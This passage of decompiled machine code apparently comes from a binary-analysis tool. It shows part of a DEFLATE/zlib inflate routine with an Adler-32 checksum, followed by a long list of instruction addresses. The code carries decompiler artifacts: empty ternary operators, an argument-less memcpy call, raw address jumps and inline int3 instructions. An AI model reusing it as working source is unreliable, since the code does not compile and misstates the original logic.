																											_t907 = _t1065;
																											_t773 = ( *_t846 & 0x000000ff) << _t907;
																											_t846 = _t846 + 1;
																											_t1013 = _t1013 | _t773;
																											 *(_t1066 - 0x18) = _t846;
																											_t1065 = _t1065 + 8;
																											 *(_t1066 - 4) = _t1013;
																											__eflags = _t1065 - 0xf;
																										} while (_t1065 < 0xf);
																										goto L197;
																									}
																								}
																								goto L295;
																							}
																							L215:
																							_t1014 =  *(_t1029 + 0x2c);
																							_t745 =  *(_t1029 + 0x30) + _t1014;
																							__eflags = _t745 - _t907;
																							if(_t745 != _t907) {
																								L269:
																								_t684 = _t745 | 0xffffffff;
																								 *_t1029 = 0x15;
																								goto L291;
																							} else {
																								L216:
																								memcpy(_t1029 + 0x40, _t1029 + 0x2924, _t1014);
																								_t751 =  *(_t1029 + 0x2c) + 0x2924 + _t1029;
																								__eflags = _t751;
																								memcpy(_t1029 + 0xde0, _t751,  *(_t1029 + 0x30));
																								_t1068 = _t1068 + 0x18;
																								goto L217;
																							}
																							goto L295;
																						}
																					}
																				} else {
																					L149:
																					__eflags = _t906 - 1;
																					if(_t906 > 1) {
																						L267:
																						 *(_t1066 - 0xc) = 0xffffffff;
																						 *_t1029 = 0x23;
																						goto L292;
																					} else {
																						goto L150;
																					}
																				}
																				goto L295;
																			}
																			L218:
																			_t988 =  *(_t1066 - 4);
																			while(1) {
																				L38:
																				_t883 =  *(_t1066 - 0x20) - _t846;
																				__eflags = _t883 - 4;
																				if(_t883 < 4) {
																					goto L57;
																				}
																				goto L39;
																			}
																			goto L57;
																		}
																	}
																} else {
																	L89:
																	_t595 = _t1050 & 0x00000007;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		L92:
																		_t940 = _t1050 & 0x00000007;
																		_t987 = _t997 >> _t940;
																		_t1050 = _t1050 - _t940;
																		 *(_t1066 - 4) = _t987;
																		_t941 = 0;
																		__eflags = 0;
																		while(1) {
																			L93:
																			 *(_t1066 - 8) = _t941;
																			__eflags = _t941 - 4;
																			if(_t941 >= 4) {
																				break;
																			}
																			L94:
																			__eflags = _t1050;
																			if(_t1050 == 0) {
																				L100:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					L244:
																					 *_t1029 = 7;
																					goto L285;
																				} else {
																					L101:
																					_t595 =  *_t846;
																					_t846 = _t846 + 1;
																					(_t1029 + 0x2920)[_t941] = _t595;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 0x18) = _t846;
																					continue;
																				}
																			} else {
																				L95:
																				__eflags = _t1050 - 8;
																				if(_t1050 >= 8) {
																					L99:
																					(_t1029 + 0x2920)[_t941] = _t987;
																					_t1050 = _t1050 - 8;
																					_t987 = _t987 >> 8;
																					_t941 = _t941 + 1;
																					 *(_t1066 - 4) = _t987;
																					continue;
																				} else {
																					while(1) {
																						L96:
																						__eflags = _t846 -  *(_t1066 - 0x20);
																						if(_t846 >=  *(_t1066 - 0x20)) {
																							break;
																						}
																						L97:
																						_t595 = ( *_t846 & 0x000000ff) << _t1050;
																						_t846 = _t846 + 1;
																						_t987 = _t987 | _t595;
																						 *(_t1066 - 0x18) = _t846;
																						_t1050 = _t1050 + 8;
																						 *(_t1066 - 4) = _t987;
																						__eflags = _t1050 - 8;
																						if(_t1050 < 8) {
																							continue;
																						} else {
																							L98:
																							_t941 =  *(_t1066 - 8);
																							goto L99;
																						}
																						goto L295;
																					}
																					L243:
																					 *_t1029 = 6;
																					goto L285;
																				}
																			}
																			goto L295;
																		}
																		L102:
																		_t595 =  *(_t1029 + 0x2922) & 0x000000ff;
																		 *(_t1066 - 8) = ( *(_t1029 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1029 + 0x2920) & 0x000000ff;
																		__eflags =  *(_t1066 - 8) - ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff);
																		if( *(_t1066 - 8) != ((( *(_t1029 + 0x2923) & 0x000000ff) << 0x00000008 | _t595) ^ 0x0000ffff)) {
																			L265:
																			 *(_t1066 - 0xc) = 0xffffffff;
																			 *_t1029 = 0x27;
																			goto L292;
																		} else {
																			L103:
																			_t949 =  *(_t1066 - 8);
																			while(1) {
																				L104:
																				__eflags = _t949;
																				if(_t949 == 0) {
																					goto L84;
																				}
																				L105:
																				__eflags = _t1050;
																				if(_t1050 == 0) {
																					L112:
																					_t595 =  *(_t1066 - 0x10);
																					while(1) {
																						L113:
																						__eflags = _t949;
																						if(_t949 == 0) {
																							break;
																						}
																						L115:
																						_t1025 =  *((intOrPtr*)(_t1066 - 0x40));
																						__eflags = _t595 - _t1025;
																						if(_t595 < _t1025) {
																							L117:
																							_t595 =  *(_t1066 - 0x20);
																							__eflags = _t846 - _t595;
																							if(_t846 >= _t595) {
																								L247:
																								_t1029 =  *(_t1066 - 0x14);
																								 *_t1029 = 0x26;
																								goto L285;
																							} else {
																								L118:
																								_t987 = _t1025 -  *(_t1066 - 0x10);
																								_t1047 = _t595 - _t846;
																								__eflags = _t987 - _t1047;
																								_t817 =  <  ? _t987 : _t1047;
																								__eflags = ( <  ? _t987 : _t1047) - _t949;
																								if(( <  ? _t987 : _t1047) >= _t949) {
																									_t1029 = _t949;
																								} else {
																									__eflags = _t987 - _t1047;
																									_t1029 =  <  ? _t987 : _t1047;
																								}
																								L121:
																								L122:
																								memcpy();
																								_t846 = _t846 + _t1029;
																								_t595 =  *(_t1066 - 0x10) + _t1029;
																								_t1068 = _t1068 + 0xc;
																								 *(_t1066 - 0x18) = _t846;
																								_t949 =  *(_t1066 - 8) - _t1029;
																								 *(_t1066 - 0x10) = _t595;
																								 *(_t1066 - 8) = _t949;
																								continue;
																							}
																						} else {
																							L116:
																							_t1029 =  *(_t1066 - 0x14);
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 9;
																							goto L292;
																						}
																						goto L295;
																					}
																					L114:
																					goto 0x421388;
																					asm("int3");
																					goto L84;
																				} else {
																					L106:
																					__eflags = _t1050 - 8;
																					if(_t1050 >= 8) {
																						L109:
																						_t595 = _t987 & 0x000000ff;
																						_t987 = _t987 >> 8;
																						_t1050 = _t1050 - 8;
																						 *(_t1066 - 0x28) = _t595;
																						 *(_t1066 - 4) = _t987;
																						L110:
																						__eflags =  *(_t1066 - 0x10) -  *((intOrPtr*)(_t1066 - 0x40));
																						_t1029 =  *(_t1066 - 0x14);
																						if( *(_t1066 - 0x10) >=  *((intOrPtr*)(_t1066 - 0x40))) {
																							L246:
																							 *(_t1066 - 0xc) = 2;
																							 *_t1029 = 0x34;
																							goto L292;
																						} else {
																							L111:
																							 *(_t1066 - 0x10) =  *(_t1066 - 0x10) + 1;
																							 *( *(_t1066 - 0x10)) = _t595;
																							_t949 =  *(_t1066 - 8) - 1;
																							 *(_t1066 - 8) = _t949;
																							continue;
																						}
																					} else {
																						while(1) {
																							L107:
																							__eflags = _t846 -  *(_t1066 - 0x20);
																							if(_t846 >=  *(_t1066 - 0x20)) {
																								break;
																							}
																							L108:
																							_t595 = ( *_t846 & 0x000000ff) << _t1050;
																							_t846 = _t846 + 1;
																							_t987 = _t987 | _t595;
																							 *(_t1066 - 0x18) = _t846;
																							_t1050 = _t1050 + 8;
																							 *(_t1066 - 4) = _t987;
																							__eflags = _t1050 - 8;
																							if(_t1050 < 8) {
																								continue;
																							} else {
																								goto L109;
																							}
																							goto L295;
																						}
																						L245:
																						 *_t1029 = 0x33;
																						goto L285;
																					}
																				}
																				goto L295;
																			}
																			continue;
																		}
																	} else {
																		while(1) {
																			L90:
																			__eflags = _t846 -  *(_t1066 - 0x20);
																			if(_t846 >=  *(_t1066 - 0x20)) {
																				break;
																			}
																			L91:
																			_t823 = ( *_t846 & 0x000000ff) << _t1050;
																			_t1050 = _t1050 + 8;
																			_t997 = _t997 | _t823;
																			_t846 = _t846 + 1;
																			 *(_t1066 - 0x18) = _t846;
																			_t595 = _t1050 & 0x00000007;
																			 *(_t1066 - 4) = _t997;
																			__eflags = _t1050 - _t595;
																			if(_t1050 < _t595) {
																				continue;
																			} else {
																				goto L92;
																			}
																			goto L295;
																		}
																		L242:
																		 *_t1029 = 5;
																		goto L285;
																	}
																}
															} else {
																while(1) {
																	L86:
																	__eflags = _t846 -  *(_t1066 - 0x20);
																	if(_t846 >=  *(_t1066 - 0x20)) {
																		break;
																	}
																	L87:
																	_t595 = ( *_t846 & 0x000000ff) << _t1064;
																	_t846 = _t846 + 1;
																	_t987 = _t987 | _t595;
																	 *(_t1066 - 0x18) = _t846;
																	_t1050 = _t1064 + 8;
																	 *(_t1066 - 4) = _t987;
																	__eflags = _t1050 - 3;
																	if(_t1050 < 3) {
																		continue;
																	} else {
																		goto L88;
																	}
																	goto L295;
																}
																L241:
																 *_t1029 = 3;
																goto L285;
															}
															goto L295;
														}
														L252:
														_t595 = _t1064 & 0x00000007;
														__eflags = _t1064 - _t595;
														if(_t1064 >= _t595) {
															L256:
															_t683 =  *(_t1066 - 0x3c);
															_t890 = _t1064 & 0x00000007;
															_t992 = _t987 >> _t890;
															_t1050 = _t1064 - _t890;
															 *(_t1066 - 4) = _t992;
															__eflags = _t846 - _t683;
															if(_t846 > _t683) {
																while(1) {
																	L257:
																	__eflags = _t1050 - 8;
																	if(_t1050 < 8) {
																		goto L259;
																	}
																	L258:
																	_t846 = _t846 - 1;
																	_t1050 = _t1050 - 8;
																	__eflags = _t846 - _t683;
																	if(_t846 > _t683) {
																		continue;
																	}
																	goto L259;
																}
															}
															L259:
															L260:
															_t595 = _t1050;
															asm("bts edx, eax");
															__eflags = _t595 - 0x20;
															_t892 =  >=  ? _t992 : 0;
															_t993 = _t992 ^ _t892;
															__eflags = _t595 - 0x40;
															_t893 =  >=  ? _t993 : _t892;
															 *(_t1066 - 4) =  *(_t1066 - 4) & _t993 - 0x00000001;
															__eflags =  *(_t1066 + 0x18) & 0x00000001;
															if(( *(_t1066 + 0x18) & 0x00000001) == 0) {
																L290:
																_t684 = 0;
																__eflags = 0;
																 *_t1029 = 0x22;
																goto L291;
															} else {
																L261:
																_t894 = 0;
																while(1) {
																	L277:
																	 *(_t1066 - 8) = _t894;
																	__eflags = _t894 - 4;
																	if(_t894 >= 4) {
																		goto L290;
																	}
																	L278:
																	__eflags = _t1050;
																	if(_t1050 != 0) {
																		L281:
																		_t995 =  *(_t1066 - 4);
																		__eflags = _t1050 - 8;
																		if(_t1050 >= 8) {
																			L275:
																			_t685 = _t995 & 0x000000ff;
																			_t1050 = _t1050 - 8;
																			__eflags = _t1050;
																			 *(_t1066 - 4) = _t995 >> 8;
																			goto L276;
																		} else {
																			L282:
																			while(1) {
																				L272:
																				__eflags = _t846 -  *(_t1066 - 0x20);
																				if(_t846 >=  *(_t1066 - 0x20)) {
																					break;
																				}
																				L273:
																				_t595 = ( *_t846 & 0x000000ff) << _t1050;
																				_t1050 = _t1050 + 8;
																				_t995 = _t995 | _t595;
																				_t846 = _t846 + 1;
																				 *(_t1066 - 4) = _t995;
																				__eflags = _t1050 - 8;
																				if(_t1050 < 8) {
																					continue;
																				} else {
																					L274:
																					_t894 =  *(_t1066 - 8);
																					goto L275;
																				}
																				goto L295;
																			}
																			L284:
																			 *_t1029 = 0x29;
																			goto L285;
																		}
																	} else {
																		L279:
																		__eflags = _t846 -  *(_t1066 - 0x20);
																		if(_t846 >=  *(_t1066 - 0x20)) {
																			L283:
																			 *_t1029 = 0x2a;
																			goto L285;
																		} else {
																			L280:
																			_t685 =  *_t846 & 0x000000ff;
																			_t846 = _t846 + 1;
																			L276:
																			 *(_t1066 - 0x24) = _t685;
																			_t595 =  *(_t1029 + 0x10) << 0x00000008 |  *(_t1066 - 0x24);
																			_t894 = _t894 + 1;
																			__eflags = _t894;
																			 *(_t1029 + 0x10) = _t595;
																			continue;
																		}
																	}
																	goto L295;
																}
																goto L290;
															}
														} else {
															L253:
															while(1) {
																L254:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	break;
																}
																L255:
																_t1050 = _t1064 + 8;
																_t987 = _t987 | ( *_t846 & 0x000000ff) << _t1064;
																_t846 = _t846 + 1;
																 *(_t1066 - 4) = _t987;
																_t595 = _t1050 & 0x00000007;
																__eflags = _t1050 - _t595;
																if(_t1050 < _t595) {
																	continue;
																} else {
																	goto L256;
																}
																goto L295;
															}
															L271:
															 *_t1029 = 0x20;
															goto L285;
														}
													}
												} else {
													L48:
													__eflags = _t1064 - 0xf;
													if(_t1064 < 0xf) {
														_t1006 =  *(_t846 + 1) & 0x000000ff;
														_t884 = _t1064;
														_t723 =  *_t846 & 0x000000ff;
														_t846 = _t846 + 2;
														_t1029 =  *(_t1066 - 0x14);
														 *(_t1066 - 0x18) = _t846;
														 *(_t1066 - 4) =  *(_t1066 - 4) | (_t1006 << 0x00000008 | _t723) << _t884;
														_t1064 = _t1064 + 0x10;
														__eflags = _t1064;
														_t987 =  *(_t1066 - 4);
													}
													_t716 =  *((short*)(_t1029 + 0x160 + (_t987 & 0x000003ff) * 2));
													 *(_t1066 - 0x1c) = _t716;
													__eflags = _t716;
													if(_t716 < 0) {
														L52:
														goto 0x421349;
														asm("int3");
														asm("int3");
														asm("int3");
														do {
															L53:
															_t718 = _t987 >> _t884;
															_t884 = _t884 + 1;
															_t846 =  *((short*)(_t1029 + 0x960 + ((_t718 & 0x00000001) +  !_t846) * 2));
															__eflags = _t846;
														} while (_t846 < 0);
														 *(_t1066 - 0x1c) = _t846;
														_t846 =  *(_t1066 - 0x18);
													} else {
														L51:
														_t884 = _t716 >> 9;
													}
													L55:
													_t595 =  *(_t1066 - 8);
													_t1064 = _t1064 - _t884;
													_t987 = _t987 >> _t884;
													 *(_t1066 - 4) = _t987;
													 *( *(_t1066 - 0x10)) = _t595;
													_t884 =  *(_t1066 - 0x1c);
													__eflags = _t884 & 0x00000100;
													if((_t884 & 0x00000100) != 0) {
														L82:
														_t168 = _t1066 - 0x10;
														 *_t168 =  *(_t1066 - 0x10) + 1;
														__eflags =  *_t168;
														goto L83;
													} else {
														L56:
														_t721 =  *(_t1066 - 0x10);
														 *(_t721 + 1) = _t884;
														 *(_t1066 - 0x10) = _t721 + 2;
														while(1) {
															L38:
															_t883 =  *(_t1066 - 0x20) - _t846;
															__eflags = _t883 - 4;
															if(_t883 < 4) {
																goto L57;
															}
															goto L39;
														}
													}
												}
											}
											goto L295;
											L57:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L74:
												_t669 =  *((short*)(_t1029 + 0x160 + (_t988 & 0x000003ff) * 2));
												 *(_t1066 - 8) = _t669;
												__eflags = _t669;
												if(_t669 < 0) {
													L76:
													goto 0x421372;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L77:
														_t671 = _t988 >> _t883;
														_t883 = _t883 + 1;
														_t595 = (_t671 & 0x00000001) +  !_t846;
														_t846 =  *((short*)(_t1029 + 0x960 + _t595 * 2));
														__eflags = _t846;
													} while (_t846 < 0);
													 *(_t1066 - 8) = _t846;
													_t846 =  *(_t1066 - 0x18);
												} else {
													L75:
													_t883 = _t669 >> 9;
													_t595 = _t669 & 0x000001ff;
													 *(_t1066 - 8) = _t595;
												}
												L79:
												_t987 = _t988 >> _t883;
												_t1064 = _t1050 - _t883;
												_t884 =  *(_t1066 - 8);
												 *(_t1066 - 4) = _t987;
												__eflags = _t884 - 0x100;
												if(_t884 >= 0x100) {
													goto L83;
												} else {
													L80:
													_t825 =  *(_t1066 - 0x10);
													__eflags = _t825 -  *((intOrPtr*)(_t1066 - 0x40));
													if(_t825 >=  *((intOrPtr*)(_t1066 - 0x40))) {
														L240:
														 *(_t1066 - 0xc) = 2;
														 *_t1029 = 0x18;
														goto L292;
													} else {
														L81:
														 *_t825 = _t884;
														 *(_t1066 - 0x10) = _t825 + 1;
														continue;
													}
												}
											} else {
												L58:
												__eflags = _t883 - 2;
												if(_t883 >= 2) {
													L72:
													_t999 =  *(_t846 + 1) & 0x000000ff;
													_t697 =  *_t846 & 0x000000ff;
													_t846 = _t846 + 2;
													_t883 = _t1050;
													 *(_t1066 - 0x18) = _t846;
													 *(_t1066 - 4) =  *(_t1066 - 4) | _t999 << _t1050 + 0x00000008 | _t697 << _t883;
													_t1050 = _t1050 + 0x10;
													__eflags = _t1050;
													_t988 =  *(_t1066 - 4);
													goto L73;
												} else {
													do {
														L59:
														_t595 = _t988 & 0x000003ff;
														_t1032 =  *((short*)(_t1029 + 0x160 + _t595 * 2));
														__eflags = _t1032;
														if(_t1032 < 0) {
															L63:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L68;
															} else {
																L64:
																 *(_t1066 - 0x1c) = _t883;
																while(1) {
																	L66:
																	_t1032 =  *((short*)( *(_t1066 - 0x14) + 0x960 + ((_t988 >> _t883 & 0x00000001) +  !_t1032) * 2));
																	_t883 =  *(_t1066 - 0x1c) + 1;
																	 *(_t1066 - 0x1c) = _t883;
																	__eflags = _t1032;
																	if(_t1032 >= 0) {
																		goto L73;
																	}
																	L67:
																	_t595 = _t883 + 1;
																	__eflags = _t1050 - _t595;
																	if(_t1050 >= _t595) {
																		continue;
																	} else {
																		goto L68;
																	}
																	goto L295;
																}
																goto L73;
															}
														} else {
															L60:
															_t1034 = _t1032 >> 9;
															__eflags = _t1034;
															if(_t1034 == 0) {
																L68:
																_t1029 =  *(_t1066 - 0x14);
																L69:
																__eflags = _t846 -  *(_t1066 - 0x20);
																if(_t846 >=  *(_t1066 - 0x20)) {
																	L239:
																	 *_t1029 = 0x17;
																	goto L285;
																} else {
																	goto L70;
																}
															} else {
																L61:
																__eflags = _t1050 - _t1034;
																if(_t1050 >= _t1034) {
																	L73:
																	_t1029 =  *(_t1066 - 0x14);
																	goto L74;
																} else {
																	L62:
																	goto L68;
																}
															}
														}
														goto L295;
														L70:
														_t883 = _t1050;
														_t701 = ( *_t846 & 0x000000ff) << _t883;
														_t846 = _t846 + 1;
														_t988 = _t988 | _t701;
														 *(_t1066 - 0x18) = _t846;
														_t1050 = _t1050 + 8;
														 *(_t1066 - 4) = _t988;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
													goto L74;
												}
											}
											goto L295;
										}
									}
								} else {
									L270:
									_t684 = _t595 | 0xffffffff;
									 *_t1029 = 0x25;
									L291:
									 *(_t1066 - 0xc) = _t684;
									goto L292;
								}
							} else {
								L9:
								if(_t1050 >= _t875) {
									L12:
									_t1050 = _t1050 - _t875;
									_t842 = (_t595 << _t875) - 0x00000001 & _t988;
									_t988 = _t988 >> _t875;
									 *(_t1066 - 0x28) =  *(_t1066 - 0x28) + _t842;
									_t595 =  *(_t1066 - 0x28);
									 *(_t1066 - 4) = _t988;
									goto L14;
								} else {
									L10:
									while(_t846 <  *(_t1066 - 0x20)) {
										_t595 = ( *_t846 & 0x000000ff) << _t1050;
										_t846 = _t846 + 1;
										_t875 =  *(_t1066 - 0x38);
										_t988 = _t988 | _t595;
										_t1050 = _t1050 + 8;
										 *(_t1066 - 0x18) = _t846;
										 *(_t1066 - 4) = _t988;
										if(_t1050 < _t875) {
											continue;
										} else {
											goto L12;
										}
										goto L295;
									}
									 *_t1029 = 0x1b;
									L285:
									__eflags =  *(_t1066 + 0x18) & 0x00000002;
									L286:
									L287:
									_t596 =  !=  ? 1 : _t595;
									 *(_t1066 - 0xc) = _t596;
									__eflags = _t596 - 1;
									if(_t596 != 1) {
										L288:
										__eflags = _t596 - 0xfffffffc;
										if(_t596 != 0xfffffffc) {
											L289:
											L292:
											_t641 =  *(_t1066 - 0x3c);
											__eflags = _t846 - _t641;
											if(_t846 > _t641) {
												while(1) {
													L293:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L295;
													}
													L294:
													_t846 = _t846 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t846 - _t641;
													if(_t846 > _t641) {
														continue;
													}
													goto L295;
												}
											}
										}
									}
								}
							}
							goto L295;
							L4:
							goto 0x4212ba;
							asm("int3");
							asm("int3");
							asm("int3");
							do {
								L6:
								_t657 = _t987 >> _t872;
								_t872 = _t872 + 1;
								_t846 =  *((short*)(_t1029 + 0x1700 + ((_t657 & 0x00000001) +  !_t846) * 2));
								__eflags = _t846;
							} while (_t846 < 0);
							 *(_t1066 - 0x1c) = _t846;
							_t846 =  *(_t1066 - 0x18);
							_t660 =  *(_t1066 - 0x1c);
							goto L8;
						}
					}
					L295:
					_t968 =  *(_t1066 - 4);
					L296:
					 *(_t1029 + 4) = _t1050;
					asm("bts ecx, esi");
					__eflags = _t1050 - 0x20;
					_t598 =  >=  ? 0 : 0;
					_t860 = 0 ^ _t598;
					__eflags = _t1050 - 0x40;
					_t599 =  >=  ? _t860 : _t598;
					 *(_t1029 + 0x20) =  *(_t1066 - 0x28);
					_t970 =  *(_t1066 - 0x10) -  *(_t1066 + 0x10);
					__eflags =  *(_t1066 + 0x18) & 0x00000009;
					 *(_t1029 + 0x24) =  *(_t1066 - 8);
					 *(_t1029 + 0x28) =  *(_t1066 - 0x38);
					 *((intOrPtr*)(_t1029 + 0x3c)) =  *((intOrPtr*)(_t1066 - 0x48));
					 *(_t1029 + 0x38) = _t860 - 0x00000001 & _t968;
					 *(_t1066 - 0x10) = _t970;
					 *((intOrPtr*)( *((intOrPtr*)(_t1066 + 8)))) = _t846 -  *(_t1066 - 0x3c);
					_t848 =  *(_t1066 - 0xc);
					 *( *(_t1066 + 0x14)) = _t970;
					if(( *(_t1066 + 0x18) & 0x00000009) != 0) {
						L297:
						__eflags = _t848;
						if(_t848 >= 0) {
							L298:
							_t1052 =  *(_t1029 + 0x1c);
							_t863 = _t1052 & 0x0000ffff;
							_t609 = (0x5e6ea9af * _t970 >> 0x20 >> 0xb) * 0x15b0;
							_t1053 = _t1052 >> 0x10;
							 *(_t1066 - 0x3c) = _t1053;
							_t974 =  *(_t1066 - 0x10) - _t609;
							__eflags =  *(_t1066 - 0x10);
							 *(_t1066 - 0x34) = _t974;
							if( *(_t1066 - 0x10) != 0) {
								L299:
								_t850 = _t974;
								do {
									L300:
									_t975 = 0;
									 *(_t1066 + 0x14) = 0;
									__eflags = _t850 - 7;
									if(_t850 > 7) {
										L301:
										goto 0x42149d;
										asm("int3");
										asm("int3");
										asm("int3");
										L302:
										_t1031 = _t1029 - _t609;
										__eflags = _t1031;
										do {
											L303:
											_t975 =  &(_t975[2]);
											_t865 = _t863 + ( *_t609 & 0x000000ff);
											_t866 = _t865 + ( *( *(_t1066 + 0x10) + 1) & 0x000000ff);
											_t867 = _t866 + ( *( *(_t1066 + 0x10) + 2) & 0x000000ff);
											_t868 = _t867 + ( *( *(_t1066 + 0x10) + 3) & 0x000000ff);
											_t869 = _t868 + ( *( *(_t1066 + 0x10) + 4) & 0x000000ff);
											_t870 = _t869 + ( *( *(_t1066 + 0x10) + 5) & 0x000000ff);
											_t871 = _t870 + ( *( *(_t1066 + 0x10) + 6) & 0x000000ff);
											_t863 = _t871 + ( *( *(_t1066 + 0x10) + 7) & 0x000000ff);
											_t639 =  *(_t1066 + 0x10) + 8;
											_t1053 = _t1053 + _t865 + _t866 + _t867 + _t868 + _t869 + _t870 + _t871 + _t863;
											 *(_t1066 + 0x10) = _t639;
											__eflags = _t639 + _t1031 - _t850;
											_t609 =  *(_t1066 + 0x10);
										} while (_t639 + _t1031 < _t850);
										 *(_t1066 + 0x14) = _t975;
										 *(_t1066 - 0x3c) = _t1053;
									}
									L305:
									_t1029 = 0;
									 *((intOrPtr*)(_t1066 + 8)) = 0;
									__eflags = _t975 - _t850;
									if(_t975 < _t850) {
										L306:
										__eflags = _t850 - _t975 - 2;
										if(_t850 - _t975 >= 2) {
											L307:
											_t619 =  *(_t1066 + 0x14);
											_t1056 =  *(_t1066 + 0x10);
											_t851 = 0;
											_t986 = (_t850 - _t619 - 2 >> 1) + 1;
											__eflags = _t986;
											 *(_t1066 + 0x14) = _t619 + _t986 * 2;
											do {
												L308:
												_t864 = _t863 + ( *_t1056 & 0x000000ff);
												_t622 =  *(_t1056 + 1) & 0x000000ff;
												_t1029 = _t1029 + _t864;
												_t1056 = _t1056 + 2;
												_t863 = _t864 + _t622;
												_t851 = _t851 + _t863;
												_t986 = _t986 - 1;
												__eflags = _t986;
											} while (_t986 != 0);
											_t975 =  *(_t1066 + 0x14);
											 *(_t1066 + 0x10) = _t1056;
											_t1053 =  *(_t1066 - 0x3c);
											 *((intOrPtr*)(_t1066 + 8)) = _t851;
											_t850 =  *(_t1066 - 0x34);
										}
										L310:
										__eflags = _t975 - _t850;
										if(_t975 < _t850) {
											_t980 =  *(_t1066 + 0x10);
											_t863 = _t863 + ( *_t980 & 0x000000ff);
											_t1053 = _t1053 + _t863;
											_t981 =  &(_t980[1]);
											__eflags = _t981;
											 *(_t1066 + 0x10) = _t981;
										}
										L312:
										_t609 =  *((intOrPtr*)(_t1066 + 8)) + _t1029;
										_t1053 = _t1053 + _t609;
										__eflags = _t1053;
									}
									L313:
									L314:
									_t863 = _t863 + (_t609 * _t863 >> 0x20 >> 0xf) * 0xffff000f;
									_t609 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
									_t1053 = _t1053 + _t609;
									_t586 = _t1066 - 0x10;
									 *_t586 =  *(_t1066 - 0x10) - _t850;
									__eflags =  *_t586;
									_t850 = 0x15b0;
									 *(_t1066 - 0x3c) = _t1053;
									 *(_t1066 - 0x34) = 0x15b0;
								} while ( *_t586 != 0);
								goto 0x4214c6;
								asm("int3");
							}
							L316:
							_t1055 = (_t1053 << 0x10) + _t863;
							 *(_t1029 + 0x1c) = _t1055;
							__eflags = _t848;
							if(_t848 == 0) {
								__eflags =  *(_t1066 + 0x18) & 0x00000001;
								if(( *(_t1066 + 0x18) & 0x00000001) != 0) {
									__eflags = _t1055 -  *(_t1029 + 0x10);
									_t848 =  !=  ? 0xfffffffe : _t848;
								}
							}
						}
					}
					L319:
					return _t848;
					L320:
				}
				L264:
				 *__edi = 0x1a;
				goto L285;
			}

0x004053df
0x004053df
0x004053df
0x004053df
0x004053df
0x004053df
0x004053e2
0x00000000
0x00000000
0x004053e8
0x004053eb
0x004053ef
0x004053f0
0x004053f2
0x004053f5
0x004053f8
0x004053fe
0x00406161
0x00406168
0x00406170
0x00406173
0x00406175
0x0040618f
0x0040618f
0x00406192
0x00000000
0x00406198
0x00406198
0x0040619d
0x0040619d
0x004061a0
0x004061a0
0x004061ae
0x004061b9
0x004061ba
0x004061bd
0x004061c0
0x004061c2
0x00000000
0x00000000
0x004061c8
0x004061c9
0x004061cb
0x00000000
0x004061d1
0x004061d1
0x004061d1
0x00000000
0x004061d1
0x00000000
0x004061cb
0x00000000
0x004061a0
0x00406177
0x00406177
0x00406177
0x0040617a
0x0040617c
0x00000000
0x00406182
0x00406182
0x00406182
0x00406184
0x00000000
0x0040618a
0x0040618a
0x00000000
0x0040618a
0x00406184
0x0040617c
0x00000000
0x00405404
0x00405404
0x0040540b
0x00405413
0x00405418
0x00000000
0x00000000
0x0040541a
0x0040541c
0x0040541f
0x00405451
0x00405451
0x00405453
0x00405455
0x0040545c
0x00405463
0x00405466
0x00405469
0x0040546e
0x004054ae
0x004054b1
0x004054b4
0x004054b9
0x004054c5
0x004054c5
0x004054cd
0x004054d5
0x004054d8
0x004054dc
0x004054df
0x004054e1
0x004054e4
0x0040551f
0x0040551f
0x00405522
0x00405586
0x00405586
0x0040558b
0x00405590
0x00405590
0x00405593
0x00405596
0x0040559c
0x0040559f
0x004055a3
0x004055a6
0x004055a9
0x004055ac
0x004055ac
0x004055b1
0x004055b4
0x004055b7
0x004055ba
0x004055bd
0x004055c0
0x004055c2
0x004055c4
0x004055c4
0x004055c9
0x004055ca
0x004055cc
0x004055ce
0x004055d1
0x004055d4
0x00000000
0x00000000
0x00000000
0x004055d4
0x00405524
0x00405524
0x00405524
0x00405527
0x00000000
0x00405529
0x00405529
0x00405529
0x0040552e
0x00405534
0x00405536
0x00405539
0x00405540
0x00405540
0x00405542
0x00405544
0x00405547
0x0040554a
0x0040554d
0x00405550
0x00405550
0x00405554
0x00405557
0x0040555d
0x00405560
0x00405563
0x00405566
0x00405569
0x0040556c
0x00000000
0x0040556e
0x0040556e
0x0040556e
0x00405570
0x00405572
0x00405572
0x00405577
0x00405578
0x0040557a
0x0040557c
0x0040557f
0x00405582
0x00405584
0x004055d6
0x004055d6
0x004055db
0x004055df
0x004055e2
0x004055e2
0x004055e5
0x004055e5
0x004055e5
0x004055e5
0x004055e5
0x00405570
0x0040556c
0x00405527
0x00000000
0x004054e6
0x004054e6
0x004054e6
0x004054e6
0x004054e8
0x004054e9
0x004054ee
0x00000000
0x00000000
0x004054f4
0x004054fa
0x004061ff
0x004061ff
0x00406206
0x00000000
0x00405500
0x00405500
0x00405512
0x00405515
0x00405518
0x0040551a
0x00000000
0x0040551a
0x00000000
0x004054fa
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x004055f6
0x004055fc
0x004055ff
0x00405602
0x00000000
0x00405608
0x00405608
0x00405608
0x0040560b
0x0040560d
0x00405611
0x00405613
0x00405616
0x0040561e
0x00405623
0x00405626
0x00405626
0x00405629
0x00405629
0x00405633
0x0040563b
0x0040563e
0x00405640
0x00405649
0x00405649
0x0040564e
0x0040564f
0x00405650
0x00405651
0x00405651
0x00405655
0x00405657
0x0040565b
0x0040565d
0x00405665
0x00405665
0x00405669
0x0040566c
0x00405642
0x00405642
0x00405644
0x00405644
0x0040566f
0x0040566f
0x00405671
0x00405673
0x00405676
0x00405679
0x0040567f
0x0040584a
0x0040584a
0x00405850
0x00405853
0x00405859
0x004060f6
0x004060f6
0x004060fd
0x00406103
0x00406109
0x0040610c
0x0040610f
